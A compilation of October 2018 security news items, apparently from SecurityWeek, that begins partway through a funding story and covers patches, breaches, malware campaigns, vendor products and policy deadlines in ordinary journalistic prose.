This is one of the largest ever funding rounds for a UK cybersecurity firm from UK venture capital, and the largest since Digital Shadows raised $26 million in September 2017. It continues a growing trend for London to be Europe's focus for tech investments. In 2017, UK firms raised £2.45 billion, almost four times more than Germany (£694m) and more than France, Ireland and Sweden combined.

Garrison provides hardware-based web isolation that allows users free and unrestricted -- but secure -- access to the internet. Its product, Silicon Assured Video Isolation technology (Garrison SAVI) converts potentially dangerous web content to a stream of harmless pixels.

"Organizations today recognize the ever-growing threat to their most sensitive data and systems posed simply by allowing employees to browse the web, but until now they've faced an unhappy choice: restrict web access and allow productivity to suffer, or run the risk of exposure to hackers," comments Garrison CEO David Garfield.

"We've designed the world's first truly secure web browser to solve this problem, applying national-security-grade levels of protection to the commercial environment -- at an accessible price point -- in a way that doesn't destroy the user experience as employees go about their work," the company claims.

'National-security-grade', like 'military-grade encryption', is one of those meaningless marketing terms used to impress potential customers. In this case, Garfield could be excused. Garrison was founded in 2014 by David Garfield and Henry Harrison, who previously worked together at national-security specialist Detica plc and subsequently established the Cyber Security business unit at BAE Systems plc. Garrison also includes the UK government among its customers.

"The security industry has long suffered from overblown claims and overinflated prices, without ever ensuring organizations remain truly protected from even some of the most basic threats -- this is particularly true of web browsing security," continued Garfield. "From day one our mission has been developing practical security tools that actually do what they're supposed to."

SAVI is already in use by employees within global blue-chip organizations across the banking, insurance, media, telecoms and legal sectors. "This funding round," said Garfield, "marks a key milestone for our business and will help us to transform the day-to-day security of many thousands more organizations worldwide." The firm says the funds will be used "to expand Garrison's sales and marketing activities, to grow the company's engineering team and to enhance the company's ësafe web browsing as a service' cloud offering."


Microsoft Incompletely Patches JET Database Vulnerability
18.10.2018 securityweek
Vulnerebility

An out-of-bounds (OOB) write bug in the Microsoft JET Database Engine that could be exploited for remote code execution has been incompletely addressed with the latest Patch Tuesday security updates, 0patch says.

Tracked as CVE-2018-8423, the flaw was publicly revealed in late September, after Microsoft failed to provide a patch for it in the September 2018 Patch Tuesday set of updates. As 120 days had passed since the vendor was informed of the bug, Trend Micro's Zero Day Initiative (ZDI) shared the information publicly.

It didn’t take long before the first fix arrived. It wasn’t an official update, but a third-party micro-patch developed by 0patch, a community project that aims at resolving software vulnerabilities by delivering tiny fixes to users worldwide.

Last week, Microsoft delivered an official patch for the vulnerability, as part of its October 2018 Patch Tuesday, but it appears that the fix wasn’t complete, and only limited the vulnerability instead of fully addressing it, ACROS Security CEO Mitja Kolsek explains.

The micro-fixes from the community are designed in such a manner that they are immediately replaced by the official patches, when they become available. This is what happened last week as well, when the micro-patch released in late September was replaced by Microsoft’s update.

The bug was found to impact all Windows versions that use two specific variants of the msrd3x40.dll library. What Microsoft did last week was to deliver an entirely new version of that file to all of its users, thus rendering systems vulnerable once again.

The micro-patch is being applied to the affected library in memory, every time the module gets loaded in any running process. Because the DLL was replaced with a new version and its cryptographic hash also changed, the micro-patch ceased to work after applying the October 2018 Patch Tuesday update.

According to Kolsek, “Microsoft's October update actually re-opened the CVE-2018-8423 vulnerability for 0patch users who were previously protected by our micropatch.”

This determined the community to release another fix, which addresses the issue once again for all fully updated 32-bit and 64-bit Windows 10, Windows 8.1, Windows 7, Windows Server 2008 and Windows Server 2012 systems.

“We suspect all other affected Windows versions also share the same version of msrd3x40.dll, in which case the micropatch will apply there as well,” Kolsek notes.

Users who haven’t installed the October patches yet but do have the 0patch Agent installed and did apply the initial micropatch continue to be protected, Kolsek also points out.


Google Boosts Protection of Backups in Android
18.10.2018 securityweek
Android

The latest Android iteration leverages Google Cloud’s Titan technology to better protect users’ backed-up application data, Google says.

The functionality combines Android’s Backup Service and Google Cloud’s Titan technology, ensuring that user privacy is maintained, the Internet giant explains.

Backed-up application data in Android 9 can only be decrypted by a key generated at the client and encrypted using the user's lock-screen PIN/pattern/passcode.

The passcode-protected key material is then encrypted to a Titan security chip on Google’s datacenter, which is configured to release the key only “when presented with a correct claim derived from the user's passcode.”

“Because the Titan chip must authorize every access to the decryption key, it can permanently block access after too many incorrect attempts at guessing the user’s passcode, thus mitigating brute force attacks,” Google reveals.

The Internet search company also says that custom Titan firmware that cannot be updated without completely erasing the chip is in charge with strictly enforcing the limited number of incorrect attempts. This should prevent access to a user's backed-up application data without the passcode.

The setup, Google says, was meant to prevent all unauthorized access to the data, including that of Google employees. The strong security stance this provides has been already verified through a security audit performed by the NCC Group.

The audit, which looked into the Google Cloud Key Vault as a whole, did find issues (including two critical ones in the firmware, both immediately addressed), but concluded that Google has implemented mitigations for a broad range of attack scenarios (including internal threats) right from the design phase.

“NCC Group was impressed by both the well-rounded design and the high-quality code which took security into consideration. Numerous possible avenues of achieving a compromise were investigated and most of these ended with a determination that the design and implementation were already taking the particular attack into account and had sufficient mitigations,” NCC Group notes in their report (PDF).

According to Google, it aims to maintain transparency and openness through external reviews of its security efforts, so that users could feel safe when it comes to their data.

Last week, however, the company proved that it isn’t always as transparent, when it publicly revealed that it learned in March of a vulnerability in one of its APIs that exposed Google+ user data to any application using that API. Google chose not to disclose the issue for over six months.


FDA Warns of Flaws in Medtronic Programmers
18.10.2018 securityweek
Vulnerebility

A vulnerability in the software update process of certain Medtronic Programmer models has determined the vendor to block the functionality on affected devices, the U.S. Food and Drug Administration (FDA) informs.

The flaw was found to impact the Internet connection of Medtronic's Carelink 2090 and Carelink Encore 29901 programmers, and could allow malicious attackers to tamper with the programmers or implanted devices, the FDA reveals.

The programmers are used during implantation and regular follow-up visits for Medtronic cardiac implantable electrophysiology devices (CIEDs) such as pacemakers, implantable defibrillators, cardiac resynchronization devices, and insertable cardiac monitors.

The programmers allow physicians to obtain data from CIEDs (including performance information and battery status) and adjust or reprogram devices, but are also used by Medtronic to deliver software updates to the implanted devices.

The programmer software can be downloaded and updated over the Internet, by connecting to the Medtronic Software Distribution Network (SDN), or by physically plugging a universal serial bus (USB) device into the programmer.

Medtronic has discovered the vulnerabilities in the Internet connection of both Carelink 2090 and Carelink Encore 29901 programmers and has disabled access to the SDN through a software update.

“To remediate these vulnerabilities and enhance cybersecurity of device programmers, Medtronic has disabled access to the SDN. When software updates are needed, a Medtronic representative will manually update, via a secured USB, all CareLink 2090 and CareLink Encore 29901 programmers,” Medtronic notes in a security bulletin (PDF).

Although the programmers use a virtual private network (VPN) to connect to the Medtronic SDN over the Internet, the devices would not verify that they were still connected to the VPN before starting to download software updates.

“To address this cybersecurity vulnerability and improve patient safety, on October 5, 2018, the FDA approved Medtronic's update to the Medtronic network that will intentionally block the currently existing programmer from accessing the Medtronic SDN,” the FDA says.

Now, any attempt to update the programmer over the Internet by selecting the "Install from Medtronic" option will result in error messages such as "Unable to connect to local network" or "Unable to connect to Medtronic."

“To date, there are no known reports of patient harm related to these cybersecurity vulnerabilities,” the FDA’s safety communication reads.

Previously, the United States Department of Homeland Security (DHS) alerted on the vulnerabilities in 2090 Programmers in February, revealing that they “may allow an attacker with physical access […] to obtain per-product credentials to the software deployment network.”

“Additionally, successful exploitation of these vulnerabilities may allow an attacker with local network access to influence communications between the Programmer and the software deployment network,” the DHS notes in its alert.


New IBM Security Platform Connects Data, Tools From Several Vendors
18.10.2018 securityweek
Safety

IBM Security on Monday unveiled a new cloud-based platform that combines the company's own capabilities with data, applications and tools from more than a dozen other vendors.

IBM Security Connect, expected to become available in the first quarter of 2019, has been described by IBM as an AI-powered community platform for security applications.

An analysis conducted by the company showed that, on average, cybersecurity teams are using more than 80 cybersecurity tools from 40 different vendors. IBM found not only that many of the capabilities provided by these tools are not used, but also that integration problems can pose a challenge.

IBM Security Connect aims to solve this with a single platform that integrates IBM's own products with data and capabilities provided by 16 other vendors. The list of vendors includes Cisco, Capgemini, Check Point, Carbon Black, CrowdStrike, EY, ForeScout, Forcepoint, Fortinet, McAfee, Qualys, Smarttech, Symantec, Tenable, Trend Micro, and VMware.

IBM and its partners have already created hundreds of apps that are available through the IBM Security App Exchange, but the aforementioned firms have promised to contribute to the development of other integrated applications on the new platform. It's worth noting that the Security App Exchange and other IBM security applications will be housed by the new platform.

IBM says the new platform will be open with an open development community.

IBM Security Connect will initially allow organizations to connect multiple security products and data repositories and automatically federate data in order to allow security teams to prioritize threats and respond.

Additionally, IBM Security Connect will feature expertise from the company's more than 4,000 global security practitioners, and 50 IBM developers will focus on the growth of the community.

“The growth of cybersecurity technology and data combined with a growing skills shortage is creating an unexpected level of complexity for security teams,” said Marc van Zadelhoff, General Manager at IBM Security. “Leveraging the power of the cloud, we can now bring together tools, data and people without expensive customization and integration projects. Data federation through IBM Security Connect helps give security professionals increased security visibility and efficiency without the hassle of migrating data or overly complicated product integrations.”


Feds Investigate After Hackers Attack Water Utility
18.10.2018 securityweek
Attack

Federal and state officials are working with a North Carolina water utility after hackers attacked some of its computer systems.

The head of the Onslow Water and Sewer Authority said in a news release Monday that its internal computer system, including servers and personal computers, were subjected to what was characterized as "a sophisticated ransomware attack."

CEO Jeffrey Hudson said while customer information wasn't compromised in the attack, many other databases have to be recreated. He added that the FBI, the Department of Homeland Security and the state of North Carolina have been called in.

Hudson said the utility began experiencing virus attacks from a malware system on Oct. 4. He said it was believed the virus was brought under control, but security specialists were called when the problem persisted.

Last December, Mecklenburg County computer systems were hacked and local leaders refused to pay a hacker $23,000 to unlock data on county servers frozen by malicious software. The computers handled a collection of property taxes, building permits and processing jail inmates. Technology workers made digital repairs with backed-up data.

In March, the city of Atlanta's computer network was the victim of a ransomware cyberattack. A city spokeswoman said the attack was discovered by the city's information security team, which noticed "something that looked peculiar" on the server and began investigating.

Also in March, a ransomware attack hit Baltimore's 911 dispatch system, prompting a roughly 17-hour shutdown of automated emergency dispatching. The Colorado Department of Transportation suffered two attacks a month earlier.


Russia-Linked Hackers Target Diplomatic Entities in Central Asia
18.10.2018 securityweek
BigBrothers

Cybersecurity companies have been monitoring the activities of a threat group that focuses on espionage campaigns aimed at diplomatic entities in Central Asia.

Earlier this month, ESET detailed the threat actor's operations, which it tracks as Nomadic Octopus, at the Virus Bulletin conference. On Monday, Kaspersky also published a blog post covering some of the group's attacks and tools.

According to Kaspersky, which tracks the group as DustSquad, the hackers appear to speak Russian.

Anton Cherepanov, the ESET senior malware researcher who detailed Nomadic Octopus at Virus Bulletin, confirmed for SecurityWeek that the hackers may speak Russian based on the spear-phishing emails they send out and the use of Russian malware filenames.

ESET, which says the threat actor is very persistent, has identified only one type of malware used by Nomadic Octopus and has found evidence that the group has been active since at least 2015.

Kaspersky, however, has discovered both Windows and Android malware, and identified a campaign that dates as far back as 2014. The cyberspies appear to be focusing on private individuals and diplomatic entities in Central Asia, mostly former Soviet Union countries and Afghanistan.

In April 2018, researchers at Kaspersky discovered a new sample of DustSquad's Windows malware, which they are tracking as Octopus. The malware had been disguised as the Telegram messaging application, specifically a Russian version that appeared to have been used by the Democratic Choice (DVK) opposition party in Kazakhstan. The fake app emerged just as Kazakhstan had threatened to block Telegram over its use by the DVK.

DustSquad uses the Delphi programming language to develop its Octopus Trojan, the same as Sofacy's Zebrocy malware. While both DustSquad and Sofacy have been linked to Russia and malware from both groups was found on compromised machines, Kaspersky believes the threat actors are not related.

An analysis of the Octopus malware's different components revealed some apparently unfinished functionality. However, experts believe that the malware was actually created in a hurry and its developers decided not to implement certain capabilities.

Once it infects a system, the malware gives attackers remote access to the targeted machine, including the ability to execute commands, upload and download files, take screenshots, and search for RAR archives.

"Political entities in Central Asia have been targeted throughout 2018 by different actors, including IndigoZebra, Sofacy (with Zebrocy malware) and most recently by DustSquad (with Octopus malware)," Kaspersky researchers said. "Interestingly, we observed some victims who are ‘threat magnets’ targeted by all of them. From our experience we can say that the interest shown by threat actors in this region is now high, and the traditional ‘players’ have been joined by relative newcomers like DustSquad that have sprung up locally."


Major Browsers to Kill TLS 1.0, 1.1
18.10.2018 securityweek
Safety

All major web browsers will deprecate support for the older Transport Layer Security (TLS) 1.0 and 1.1 traffic encryption protocols in the first half of 2020.

Apple, Google, Microsoft and Mozilla on Monday announced plans to kill the protocol in their browsers to provide users with better security.

The move is not surprising, given that TLS 1.0 will turn 20 in January 2019 and TLS 1.3 is already half a year old. As for TLS 1.1, it was mainly designed to address a limitation of TLS 1.0 and prevent specific attacks that can be addressed in other ways.

“Two decades is a long time for a security technology to stand unmodified. […] vulnerable third-party implementations do exist. Moving to newer versions helps ensure a more secure Web for everyone,” Microsoft says.

Both TLS 1.0 and 1.1 are known to include weaknesses, some of which were addressed with the release of TLS 1.2 a decade ago. Despite that, however, the protocols continue to be supported by more than 70% of all websites.

“These old versions of TLS rely on MD5 and SHA-1, both now broken, and contain other flaws. TLS 1.0 is no longer PCI-DSS compliant and the TLS working group has adopted a document to deprecate TLS 1.0 and TLS 1.1,” Google notes in a blog post.

TLS 1.2, which is a prerequisite for HTTP/2, delivers significant performance improvements for the web, provides better security, and is already supported by over 94% of websites. Apple says TLS 1.2 is used in 99.6% of TLS connections made from Safari.

TLS 1.3 too is expected to soon start seeing broad adoption, so the percentage of legacy TLS connections will likely drop further.

“Additionally, we expect the IETF to formally deprecate TLS 1.0 and 1.1 later this year, at which point protocol vulnerabilities in these versions will no longer be addressed by the IETF,” Microsoft points out.

Thus, in March 2020, support for legacy TLS 1.0 and 1.1 connections will be removed in all major browsers, including Chrome, Firefox, Safari, and Microsoft’s Edge and Internet Explorer 11.

Because upgrading TLS could take a lot of time, the initial announcement is made one year and a half before the planned deprecation to ensure that website developers have enough time at their disposal to complete the transition to TLS 1.2 or newer.

“For sites that need to upgrade, the recently released TLS 1.3 includes an improved core design that has been rigorously analyzed by cryptographers. TLS 1.3 can also make connections faster than TLS 1.2,” Mozilla notes.

Only a small number of websites should be impacted by the change, and servers can enable both modern and legacy options to continue to supporting legacy clients, even if that will carry security risks (DROWN, FREAK, and ROBOT attacks).


New iPhone Passcode Bypass Method Found Days After Patch
18.10.2018 securityweek
Apple

A new method that can be used to bypass the iPhone lockscreen and access photos stored on the device was disclosed just days after Apple released a patch for a similar vulnerability.

In late September, iPhone enthusiast Jose Rodriguez, known for his YouTube channel videosdebarraquito, discovered yet another method for bypassing the iPhone lockscreen. The technique works on the new iPhone XS running the latest version of Apple's mobile operating system, iOS 12.

Rodriguez showed how an attacker with physical access to the targeted device could leverage a combination of Siri and the VoiceOver feature to access photos and contacts from the phone.

Apple patched the vulnerability, which it tracks as CVE-2018-4380, on October 8 with the release of iOS 12.0.1.

However, a few days later, on October 12, Rodriguez demonstrated another passcode bypass that worked on iOS 12.0.1 as well.

The newest method also involves Siri and VoiceOver, the accessibility feature that allows individuals with visual impairments to use their Apple device by having the content of the screen and selected buttons read out to them.

The attack starts by calling the targeted device. If the phone number is not known, the attacker can have Siri read it out to them. Once the call is made, the hacker selects the Messages icon from the call screen and activates VoiceOver via Siri.

Similar to the previous passcode bypass, VoiceOver is used to navigate through hidden buttons and functions. The buttons are not visible on the screen, but VoiceOver can "see" and activate them. This allows a hacker to gain access to the Photo Library and open recent images stored there.

Compared to the previous bypass, the latest method is easier to replicate and it not only provides access to photos, but also allows the attacker to send the files to another device. In addition, the new technique poses a greater risk as the photos can be sent to a different device in full resolution – the prior hack only provided access to a smaller size preview image.

Apple will likely patch this vulnerability in an upcoming version of iOS.


Many Federal Agencies Fail to Meet DMARC Implementation Deadline
18.10.2018 securityweek
Safety

The U.S. Department of Homeland Security (DHS) last year ordered government organizations to secure their email and web assets, but many agencies have failed to meet the deadline.

The Binding Operational Directive (BOD) 18-01, issued by the DHS on October 16, 2017, instructs federal agencies to start using web and email security technologies such as HTTPS, STARTTLS, SPF and DMARC. Agencies were given one year to set their DMARC policy to “reject,” which completely blocks the delivery of unauthenticated emails.

Several cybersecurity firms have been monitoring the progress, including Agari, Valimail and Proofpoint. They all found that while significant progress has been made, there are still many agencies that are not compliant one year after the directive was issued.

Agari has been monitoring 1,144 domains and found that 851 of them, representing 74%, have implemented DMARC with a “reject” policy as dictated by BOD 18-01. The company also pointed out that of the 278 domains with no policy or a “none” policy, only 28 are defensive domains (i.e. they don’t actively send email).

There are 46 executive branch agencies that have fully implemented DMARC, and 57 that either have no DMARC record or still have a “none” policy. A majority of the organizations that failed to become compliant only have one or two domains, Agari said.

“BOD 18-01 has clearly made a positive impact on the cybersecurity posture of the United States government,” commented Agari’s Fareed Bukhari. “It’s really great to see such a dramatic increase in adoption in such a short time frame. This is the fastest and most complete adoption of the DMARC standard for any industry in history. Private enterprise is definitely lagging behind the public sector now.”

Proofpoint has monitored 1,311 domains, including federal civilian domains, and its analysis also took into account the implementation of the Sender Policy Framework (SPF), which along with DomainKeys Identified Mail (DKIM) forms the foundation of DMARC. BOD 18-01 also requires the implementation of SPF.

Data collected by Proofpoint shows that over 60% of .gov domains are compliant with the BOD. Of all the organizations, 56% have implemented DMARC themselves and 21% have contracted the services of specialized providers.

BOD 18-01 deadline

“While not every agency is DMARC compliant with BOD 18-01 at the deadline, the progress made over the past year is commendable. Ideally, we will continue to see this positive trend until each agency fully protects their domains from email spoofing attacks. And while it is nice to see other industry groups taking a similar stance with DMARC authentication, BOD 18-01 has been a promising step in the right direction that organizations in all industries should follow,” explained Robert Holmes, vice president of Email Security at Proofpoint.

Valimail, which published its report one week before the deadline, noted that half of the 1,315 .gov domains it was monitoring had been compliant with BOD 18-01.

The company pointed out that 63 percent of compliant domains were not actually used for email. It also noted that DMARC records are not present on a vast majority of military domains, but these are not covered by the DHS directive, which exempts the Department of Defense, the intelligence community and national security systems.


Chef Launches New Version for DevSecOps Automated Compliance
18.10.2018 securityweek
Safety

Chef Software has announced the latest version of its InSpec compliance automation platform for DevSecOps. InSpec provides an open source high-level language to share security and compliance rules between development, security, and operations engineers. Compliance can be with internal security policy, infrastructure provisioning, and external regulatory requirements.

InSpec allows security and compliance requirements to be expressed in a common language for all groups. So, if the security group specifies that an application requires a mandatory access control system, this can be added to InSpec as a few lines of simple code. As the development proceeds, InSpec checks that all such specified requirements are included within the application.

"Due to the human-readable way InSpec code is written, we've had success getting buy-in from the non-technical decision makers, which has been crucial in supporting our transformation efforts," comments Hans Nesbitt, cloud engineer at Pacific Life.

Where there are external regulatory requirements, the method of fulfillment can be specified in the same high-level language, and the platform will check for its inclusion within the application as development proceeds. InSpec does not tell the development team how to conform to any particular requirement -- such as GDPR or PCI -- but ensures that the chosen method of compliance specified by the security team is included within the final product. This is done continuously throughout the development cycle to ensure that security is built into the product rather than added at the end.

"With InSpec as an integral part of our pipeline, explains Keith Walters, director of partner solutions for TapHere! Technology, "we are able to automatically test for security and compliance throughout the development process. The detailed visibility into our systems that InSpec provides enables us to drive towards an Automated ATO (Authority to Operate), or approval to push live. This accelerates how we deliver mission capabilities to our citizens and service members while adhering to our security requirements."

InSpec 3.0 adds a new plugin architecture; improved exception management; compliance with Hashicorp Terraform and Google Cloud Platform (GCP); and improved metadata.

The plugin architecture makes it easier for developers to extend their use of InSpec. Directly from InSpec it allows new custom resources to be included. Via the Train (TRAnsport INterface library) it can extend the process to include new device types and clouds, such as Digital Ocean and Alibaba. It also extends InSpec's compliance capabilities with native support for GCP.

"InSpec," says Nesbitt, "has helped us break down silos between the application developers, operations and security teams as we migrate to the cloud. It gives everyone confidence that we can automatically deploy and maintain infrastructure as code in a transparent, repeatable, and secure way."

The improved exception management allows InSpec controls to be skipped on nodes where they are unnecessary or simply not required. This could include specific devices that have the specified controls already built-in; where inclusion of those controls is not necessary, perhaps because the device is air-gapped; or where the addition of the controls could interfere with delicate operations and exclusion of the controls is defined as an acceptable risk.

Integration with Terraform has two primary components: 'Provisioning' runs InSpec tests after a 'terraform apply' operation for servers and clouds; and an InSpec Generator (known as 'Iggy') generates a starter set of InSpec controls by parsing an existing Terraform state file. "This is a big deal," adds Nesbitt, "because we will catch and prevent deployment of non-compliant infrastructure, which saves costs and enhances security."

The improved metadata on controls introduces a key-value description interface that allows more fine-grained reporting, and de-duplication of controls that satisfy one or more compliance regimes. For example, users can create custom metadata categories such as what compliance regime the control is for, and how to remediate or escalate the findings.

The difficulty tackled by InSpec is the maintenance of compliance across rapidly evolving hybrid IT strategies and ever-changing regulatory requirements. "InSpec 3.0," says Corey Scobie, SVP of product and engineering at Chef, "eases the path to compliance for both developers and operations teams, and helps accelerate enterprises' digital transformations by laying a solid foundation for cloud migration."


Malicious RTF Documents Deliver Information Stealers
18.10.2018 securityweek
Virus

A newly discovered infection campaign is leveraging malicious RTF files to deliver information-stealing Trojans to the unsuspecting victims, Cisco Talos security researchers warn.

As part of the attacks, the adversaries use a well-known exploit chain for malware delivery, but have modified it so it would not trigger anti-virus detection. The final payload in this campaign was the Agent Tesla Trojan, along with other malware families, including the Loki information stealer.

The malicious documents used in this operation abuse the CVE-2017-11882 vulnerability that Microsoft patched a year ago to deliver the Agent Tesla and Loki stealers. The same infrastructure, the security researchers discovered, is also being used for the distribution of other malware families, such as Gamarue.

The RTF file delivering Agent Tesla had almost no detections on the multi-engine antivirus scanning website VirusTotal at the time of analysis, Cisco reveals.

The infection chain abuses the vulnerable Equation Editor component of Office to download a file and create the scvhost.exe process, which in turn creates another instance of itself. Next, typical command and control (C&C) traffic is observed.

Although macro language is not supported in RTF files, Microsoft Object Linking and Embedding (OLE) objects and Macintosh Edition Manager subscriber objects are. Thus, attackers can embed objects into the RTF to leverage the Equation Editor via OLE functions, and can also apply a high level of obfuscation to the document itself to avoid detection.

“We have also seen several other campaigns using the exact same infection chain, but delivering Loki as the final payload,” Cisco explains.

The Agent Tesla Trojan was designed not only with information stealing capabilities, but also with the ability to download additional malware onto the compromised machines. The threat is being sold by a company offering grayware products, which claims that the program was designed for password recovery and child monitoring.

However, the malware can steal passwords from more than 25 common applications and also includes a series of rootkit functions, such as keylogging, clipboard stealing, screenshot capturing, and webcam access.

For password theft, the malware targets applications such as Chrome, Firefox, Internet Explorer, Yandex, Opera, Outlook, Thunderbird, IncrediMail, Eudora, FileZilla, WinSCP, FTP Navigator, Paltalk, Internet Download Manager, JDownloader, Apple keychain, SeaMonkey, Comodo Dragon, Flock, and DynDNS, among others.

The malware also includes support for SMTP, FTP and HTTP exfiltration, yet it is only using the HTTP POST method. Data is sent encrypted to the C&C.

“The actor behind this malware used the RTF standard because of its complexity, and used a modified exploit of a Microsoft Office vulnerability to download Agent Tesla and other malware. It is not completely clear if the actor changed the exploit manually, or if they used a tool to produce the shellcode,” Cisco concludes.


Utimaco's Acquisition of Atalla HSM Product Line Gets Regulatory Clearance
18.10.2018 securityweek
Safety

Aachen, Germany-based Utimaco has received U.S. regulatory clearance for the acquisition of the Atalla product lines from Micro Focus it first announced in May 2018. The transaction is now scheduled to close on November 5, 2018.

Both Utimaco and Atalla are leaders in hardware security modules (HSMs), but while Utimaco has concentrated on general-purpose HSMs, Atalla has majored on payment HSMs. Utimaco's intention is to combine all HSM requirements into a single common platform for general purpose and payment purposes. "The traditional separation between "payment HSM" and "general purpose HSM" will eventually cease to exist, which is why our goal is to focus on innovation and invest in building one common platform for payment and general purpose HSM customers," explains Utimaco CEO, Malte Pollmann.

Atalla's HSM is a payments hardware module used for protecting sensitive data and associated keys for non-cash retail payment transactions, cardholder authentication and cryptographic keys. What is required, added Pollmann, is a single platform "providing the product in all required form factors: PCI, LAN and Cloud."

The underlying driver is accelerating digital transformation fueled by mobile, cloud, blockchain and new regulations. As a result, says Utimaco, financial institutions and service providers of all sizes need out-of-the-box, proven and reliable technology to seamlessly interface with current payment infrastructures, while still enabling them to easily drive and adapt to the next generation of innovative services.

Utimaco already has a payments offering in its existing PaymentServer Line. This gained PCI PTS HSM V2 accreditation in October 2017, allowing customers to meet PCI Data Security Standard (PCI DSS), PCI Point-to-Point Encryption (PCI P2PE), and even PCI HSM compliance as a delta certification with custom code running on the HSM.

The Atalla product line is seen as complementary to Utimaco's general purpose (SecurityServer) and payment (PaymentServer) lines, SecurityServer is certified to FIPS 140-2 Level 3 and physical Level 4; and this year gained Common Criteria (CC) certification for the CP5 product line.

The acquisition, said Pollmann, "is a significant milestone, and we look forward to bringing the Atalla team under the information security umbrella of Utimaco. After several changes of ownership, we are happy to offer Atalla a long-term home in our HSM and information security business," said Utimaco CEO, Malte Pollmann."

Micro Focus acquired Atalla after HPE CEO Meg Whitman announced, in September 2016, that it would be spun out and then merged with Micro Focus.

Market Research Future forecast this month that the global HSM market would grow at an annual 13% rate to reach $1.115 billion dollars in 2022. With the added momentum in the payments section from Atalla (Utimaco is already the world's second largest provider of HSMs), the firm is staking its claim for a sizable portion of that market.

Utimaco was acquired by Sophos in 2009. One year later, Sophos sold a majority interest to Apax Partners, and this was followed by a management buyout in 2013. Today, Utimaco's primary investors are EQT, PINOVA Capital and BIP Investment Partners S.A.


Insurer Anthem Will Pay Record $16M for Massive Data Breach
18.10.2018 securityweek
Incindent

The nation's second-largest health insurer has agreed to pay the government a record $16 million to settle potential privacy violations in the biggest known health care hack in U.S. history, officials said Monday.

The personal information of nearly 79 million people — including names, birthdates, Social Security numbers and medical IDs — was exposed in the cyberattack, discovered by the company in 2015.

The settlement between Anthem Inc. and the Department of Health and Human Services represents the largest amount collected by the agency in a health care data breach, officials said.

"When you have large breaches it erodes people's confidence in the privacy of their sensitive information, and we believe such a large breach of trust merits a substantial payment," said Roger Severino, director of the HHS Office for Civil Rights. The office also enforces the federal health care privacy law known as HIPAA, or the Health Insurance Portability and Accountability Act.

Severino said the Anthem settlement is nearly three times larger than the previous record amount paid to the government in a privacy case. That sends a message to the industry that "hackers are out there always and large health care entities in particular are targets," he added.

The Blue Cross-Blue Shield insurer also agreed to a corrective action plan under government monitoring, which involves a process for the company to assess its electronic security risks, take appropriate countermeasures and maintain ongoing surveillance.

Indianapolis-based Anthem covers more than 40 million people and sells individual and employer coverage in key markets like New York and California. The payment is in lieu of civil penalties that HHS may have imposed. Anthem admitted no liability. The civil case involving privacy laws is separate from any other investigation the government may be pursuing.

In a statement Monday, Anthem said it's not aware of any fraud or identity theft stemming from the breach. The company provided credit monitoring and identity theft insurance to all customers potentially affected.

"Anthem takes the security of its data and the personal information of consumers very seriously," the statement said. "We have cooperated with (the government) throughout their review and have now reached a mutually acceptable resolution."

The company discovered the data breach in early 2015, but hackers had been burrowing into its systems for weeks. Security experts said at the time that the size and scope of the attack indicated potential involvement by a foreign government.

Hackers used a common email technique called spear-phishing in which unwitting company insiders are tricked into revealing usernames and passwords. The Anthem attackers gained the credentials of system administrators, allowing them to probe deeply into the insurer's systems.

HHS said its investigation found that Anthem had failed to deploy adequate measures for countering hackers. The company lacked an enterprisewide risk analysis, had insufficient procedures to monitor activity on its systems, failed to identify and respond to suspected or known security incidents, and did not implement "adequate minimum access controls" to shut down intrusions from as early as February 2014.


VMware Patches Code Execution Flaw in Virtual Graphics Card
18.10.2018 securityweek
Vulnerebility

VMware has patched a critical arbitrary code execution vulnerability in the SVGA virtual graphics card used by its Workstation, ESXi and Fusion products.

According to an advisory published by the company on Tuesday, ESXi, Fusion and Workstation are affected by an out-of-bounds read vulnerability in the SVGA device. The flaw, tracked as CVE-2018-6974, can be exploited by a malicious guest to execute arbitrary code on the host.

The vulnerability was reported to VMware by an anonymous researcher through Trend Micro’s Zero Day Initiative (ZDI).

ZDI’s own advisory describes the security hole as a heap-based buffer overflow that allows a local attacker with low privileges on the system to escalate permissions and execute arbitrary code. ZDI revealed that the flaw was reported to VMware in mid-June.

“The specific flaw exists within the handling of virtualized SVGA,” ZDI said. “The issue results from the lack of proper validation of user-supplied data, which can result in an overflow of a heap-based buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the host OS.”

The same anonymous researcher likely also reported CVE-2018-6973, an out-of-bounds write vulnerability in the e1000 virtual network adapter used by Workstation and Fusion. This flaw also allows arbitrary code execution on the host and it was reported to VMware through ZDI on the same day as CVE-2018-6974. However, VMware resolved this vulnerability with patches released in mid-August.

Exploiting this security hole also requires at least low-privileged access to the targeted system.

While VMware has classified both vulnerabilities as “critical,” ZDI has assigned them a CVSS score of 6.9, which makes them “medium” severity.

Earlier this month, VMware also patched an “important” denial-of-service (DoS) bug discovered by Cisco Talos researchers in Workstation, ESXi and Fusion, and a serious SAML authentication bypass vulnerability in the Workspace ONE Unified Endpoint Management Console.


Oracle's October 2018 Update Includes 301 Security Fixes
18.10.2018 securityweek
Vulnerebility

Oracle’s October 2018 Critical Patch Update (CPU) was rolled out on Tuesday with 301 security fixes, bringing the total of patches released this year to 1,119.

The enterprise software giant addressed bugs in 23 products this month, including Database Server, Communications Applications, Construction and Engineering Suite, E-Business Suite, Fusion Middleware, Hospitality Applications, Java SE, MySQL, PeopleSoft, and Retail Applications.

Of the vulnerabilities addressed with the latest CPU, over 60% were remotely exploitable without authentication. One in six vulnerabilities had a CVSS score of 9.0 or above, and 162 vulnerabilities were addressed in business-critical applications, Oracle’s advisory reveals.

Fusion Middleware was the most impacted Oracle product this month. It received 65 security fixes and 56 of the addressed vulnerabilities could be exploited remotely without authentication.

MySQL saw 38 security fixes (3 remotely exploitable flaws), Retail Applications received 31 patches (21 remotely exploitable vulnerabilities), PeopleSoft 24 (21 remotely exploitable), Sun Systems Products Suite 19 (9 remotely exploitable), E-Business Suite 16 (14 remotely exploitable), while Communications Applications received 14 patches (9 remotely exploitable), the same as Virtualization (only 1 remotely exploitable).

Java SE (12 patches), Construction and Engineering Suite (10 fixes), Hospitality Applications (9), Hyperion (9), Database Server (7) JD Edwards Products (6), Supply Chain Products Suite (6), Insurance Applications (5), Enterprise Manager Products Suite (4), Food and Beverage Applications (4), Siebel CRM (3), Financial Services Applications (2), iLearning (1), Health Sciences Applications (1), and Support Tools (1) were also affected by vulnerabilities.

Oracle this month addressed a critical issue in GoldenGate (CVE-2018-2913 – CVSS Base Score: 10.0). Easily exploitable, the vulnerability could allow an unauthenticated attacker with network access via TCP to compromise and take over GoldenGate.

